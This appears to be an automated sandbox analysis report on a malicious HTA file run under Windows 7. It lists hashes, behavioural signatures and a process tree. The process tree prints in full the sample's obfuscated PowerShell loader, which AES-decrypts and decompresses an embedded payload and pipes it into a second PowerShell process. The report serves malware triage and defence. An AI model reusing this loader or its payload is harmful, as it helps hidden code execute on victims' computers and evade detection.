Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
Resource
win10v2004-20240226-en
General
-
Target
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
-
Size
72KB
-
MD5
e09e50f4c8308806ae21242538e17e88
-
SHA1
3d5d0f3e384ec93f87716cc49487cd7ef1e8714a
-
SHA256
06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f
-
SHA512
a5557c34562a8f2cf1ba07029f07d389788579c4333e0856da1b6b7ba09484015dbfcf8f6f43d3e21787e8ef70b82062d29ebbfaf57fc50ed6d2015b272c7259
-
SSDEEP
768:fEnAiXp/x27ioVgCtTLalOmilXO3SuDbvq572+/unhi1zOz:Mn/p/x27ioVgCtTLbmweSuPyKti5Oz
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2156 powershell.exe 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 2860 wrote to memory of 2156 2860 mshta.exe powershell.exe PID 2860 wrote to memory of 2156 2860 mshta.exe powershell.exe PID 2860 wrote to memory of 2156 2860 mshta.exe powershell.exe PID 2860 wrote to memory of 2156 2860 mshta.exe powershell.exe PID 2156 wrote to memory of 2612 2156 powershell.exe powershell.exe PID 2156 wrote to memory of 2612 2156 powershell.exe powershell.exe PID 2156 wrote to memory of 2612 2156 powershell.exe powershell.exe PID 2156 wrote to memory of 2612 2156 powershell.exe powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c3e011120b6ad889373fb7fd8636d767
SHA1452e693b2bb223ee6afda9cb2266f8f02e0135e7
SHA256ad5164bd9309f63da8508380cf58e1f128d8786b78aac0c0fa25a5cd1b7192f9
SHA5120edf1d610e9016b0e0c0bcce6ec2a8f74dec5fa9848b6bc61c05cf4f29df2ce6269e8667f4103cc0633a842589d5b49befe55270608b7f816e1f3f4c3dc0663b